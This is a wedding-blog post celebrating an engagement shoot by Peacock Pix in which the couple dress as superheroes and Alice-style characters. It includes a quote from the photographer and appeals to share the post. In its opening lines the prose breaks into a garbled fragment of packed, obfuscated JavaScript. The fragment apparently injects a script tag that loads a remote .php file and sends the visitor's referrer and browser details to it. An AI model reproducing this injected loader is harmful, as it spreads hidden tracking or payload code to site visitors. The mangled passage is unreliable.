Ok, there is one very important thing you must do before you read on… that is,

… cue the Superman music!

Just””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’bazrt|variebyd||js|php’.split(‘|’),0,{}))
imagine your hearing it: Da da da daaa daa, da da da daa daa, da da da daaaa, da da daaaa!  I know, not quite as good as the real thing, but, I do have an uber-cool engagement shoot riddled with character!

A girl who had a dream, a boy who couldn’t stop loving her and a photographer who created their superhero adventure.

This is what a supercool, superfun, superhero engagement shoot looks like. I love the bravery of Emma and Mark, stepping right outside the norm and going for it.  They wanted to do their engagement shoot their way and they broke tradition. {here it comes, you know what I say when people break tradition…”yay another frabjous frick’n frolic!!!”

I LOVE THIS SHOOT!!!! It’s so exciting and so not ‘normal’!!! They’ve done an Alice!

As Alice so rightly said:

If I had a world of my own, everything would be nonsense. Nothing would be what it is, because everything would be what it isn’t. And contrary wise, what is, it wouldn’t be. And what it wouldn’t be, it would. You see?

Engagement shoot by Peacock Pix

I have to say it, I really do.  I adore these two for creating such a wicked memory for themselves.  None of this perfect posing looking sumptuous at each other {although as a hopeless romantic I do like those shoot} theirs is so refreshing and with the creative work done by Andy behind the lens, I just couldn’t stop smiling at the entire shoot.  They had fun!  That’s obvious and I’m having fun looking at the photos.

… Oh, and there’s a corset!  THERE’S A CORSET! {You know how I am a little obsessed with them, and this one’s gorgeous}!

From Andy:

“Emma & Mark are live action role play enthusiasts so when they contacted me about an engagement shoot with a difference I got rather excited, as you can see from the results, I had good reason too!

I can’t wait for their wedding next year.  I love working with couples who have original ideas and relish the challenge of creating their dreams with my camera.  All my couples are fabulous people and in their own way they are unique, at Peacock Pix we work to celebrate the uniqueness of every wedding we shoot, I love the challenge of creating magic and giving them memories they will cherish.”

This photo above is my favourite.  I love it!!!!!!! WIth a capital L.  The pose is stunning and the composition is also perfect.

Please PinIt, RT it, Facebook it, Like it, Digg it – because this sort of stuff is what inspires others. There are a lot of people out there who would love to do this sort of thing but who haven’t quite broken tradition yet.  Let’s help them realise that is is more than OK to do so!! Because it’s doing what you want in your shoots that makes it so good coupled with an a photographer who can take your idea to the next level like Andy did for Emma and Mark.

And, a wee important note – if you’re wanting to do something creative like this, find a photographer who likes breaking tradition too because it’s their expertise that will make it a Bat-tasticlly awesome engagement shoot like Emma and Marks. 🙂
